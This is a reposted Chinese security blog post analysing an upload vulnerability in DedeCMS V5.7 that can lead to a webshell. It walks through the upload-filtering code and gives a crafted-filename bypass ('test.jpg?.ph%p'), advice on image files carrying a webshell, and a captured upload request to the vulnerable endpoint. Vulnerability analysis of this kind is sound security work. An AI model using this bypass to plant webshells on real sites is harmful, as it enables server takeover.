DedeCMS-V5.7 前台鸡肋&后台getshell漏洞

admin 2021年8月2日19:56:32评论1,075 views字数 3469阅读11分33秒阅读模式

0x01 吹牛逼

官方下载最新安装包http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz

织梦5.7会员中心,由于为了安全性问题,限制了注册会员在会员中心发布信息的时候上传图片,但是管理员登录会员中心发布信息的时候上传图片却不受影响。那该如何解决呢?下面我们来说明一下具体的解决方案。 首先,具体的问题为,注册会员点击图片上传,预览选择好本地图后点击上传到服务器上,会出现如下所示结果: 图片上传失败,并无像正常上传图片后提交按钮跳转到相应的图像属性界面上,仅在当前窗口上弹出一个滚动条,上面的滚动条里面提示为“提示:需输入后台管理目录才能登陆”,但因滚动条高度受限制了所以我们看不到提示。想要查看具体的提升信息的话,请点击向下的滚动条一直往下,即可出现文字提示。如图: 现在知道具体原因后就容易解决问题了,直接搜索织梦网站程序文件夹下的全部包含“提示:需输入后台管理目录才能登陆“的文件,找到include/dialog/config.php文件。其中有段代码

//检验用户登录状态  $cuserLogin = new userLogin();    if($cuserLogin->getUserID() <=0 )  {  if(emptyempty($adminDirHand))  {  ShowMsg( 提示:需输入后台管理目录才能登录请输入后台管理目录名: width:120px;  /> ,  javascript:; );  exit();  }  $gurl =  ../../{$adminDirHand}/login.php?gotopage= .urlencode($dedeNowurl);  echo  location= $gurl ; ;  exit();  }

所以说dedecms5.7要上传图片的话,必须按照上面做,我们这里是按照这个规则,认为管理员开启了会员上传图片的权限,低于5.7的只要开启会员中心即可

windows环境需要经过处理的图片马,需要处理的图片马是因为(绕过文件后缀名检测以后,php-GD对图片的渲染和处理会导致webshell代码错位失效,所以需要特殊的图片马进行绕过,图片马的制作)

漏洞文件:includedialogselect_images_post.php

<?php/**  * 图片选择  *  * @version        $Id: select_images_post.php 1 9:43 2010年7月8日Z tianya $  * @package        DedeCMS.Dialog  * @copyright      Copyright (c) 2007 - 2010, DesDev, Inc.  * @license        http://help.dedecms.com/usersguide/license.html  * @link           http://www.dedecms.com  */require_once(dirname(__FILE__)."/config.php");require_once(dirname(__FILE__)."/../image.func.php");

先看一下它引入的包,为了后期更好的读通代码。

位置:includedialogconfig.php

require_once(dirname(__FILE__)."/../common.inc.php");

继续跟踪文件

位置:includecommon.inc.php

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数if($_FILES) {    require_once(DEDEINC.'/uploadsafe.inc.php'); }

经过这个文件以后,终于可以看到一个函数了,而这个函数上面写到了作用,但它还有一个功能就是过滤掉一些非法函数,跟进去看看。

可以看到includeuploadsafe.inc.php下

$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";

禁止上传的类型,采用的是黑名单的方式。

再往下看

$imtypes = array     (        "image/pjpeg", "image/jpeg", "image/gif", "image/png",          "image/xpng", "image/wbmp", "image/bmp"     );    if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))     {        $image_dd = @getimagesize($$_key);        if (!is_array($image_dd))         {            exit('Upload filetype not allow !');         }     }

这里可以看到它判断了图片上传的类型,这个绕过只需要修改http头就可以了。

头疼的是getimagesize这个函数,这个函数的作用是获取图片大小及相关信息。

再看一下上面的select_images_post.php文件

$imgfile_name = trim(preg_replace("#[ rnt*%\/?><|":]{1,}#", '', $imgfile_name));

利用到了正则替换了。

如果在那个地方上传,http://xxx.com/xxx.jpg这样的话就会允许,但是xxx.php这样就会变成失败。

由于上面写到了正则,所以绕过的方法也很简单只要不等于黑名单的内容即可。比如http://xxxx.com/xxx.jpg?.ph%p这样等等!

往下面再看一行代码

if(!preg_match("#.(".$cfg_imgtype.")#i", $imgfile_name))

这里的代码写的不严谨,只验证了一次黑名单,而构造的图片名字是test.jpg?.ph%p

0x02 漏洞测试

环境:Linux+phpstudy

DedeCMS-V5.7 前台鸡肋&后台getshell漏洞

 上传图片抓包

POST /dedecms/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1 Host: ******* Content-Length: 42080
Cache-Control: max-age=0
Origin: http://*******
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZNrPDjZXsDjHXAYJ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://*****/dedecms/dede/archives_add.php?channelid=6&cid=0 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8
Cookie: ***
Connection: close ------WebKitFormBoundaryZNrPDjZXsDjHXAYJ Content-Disposition: form-data; name="upload"; filename="test.jpg"Content-Type: image/jpeg ******* ------WebKitFormBoundaryZNrPDjZXsDjHXAYJ--

然后把filename修改一下 

DedeCMS-V5.7 前台鸡肋&后台getshell漏洞

然后访问路径得 

DedeCMS-V5.7 前台鸡肋&后台getshell漏洞

0x03 感谢

本文感谢wind、phpoop两人的协助代码分析!为什么说后台可以getshell,因为前台编辑器是调用后台的编辑器,所以只需要上文提到注释掉了前台也可以getshell!


DedeCMS-V5.7 前台鸡肋&后台getshell漏洞


以上小姐姐所述
我司一概不负责

本文始发于微信公众号(逢人斗智斗勇):DedeCMS-V5.7 前台鸡肋&后台getshell漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月2日19:56:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DedeCMS-V5.7 前台鸡肋&后台getshell漏洞https://cn-sec.com/archives/343678.html

发表评论

匿名网友 填写信息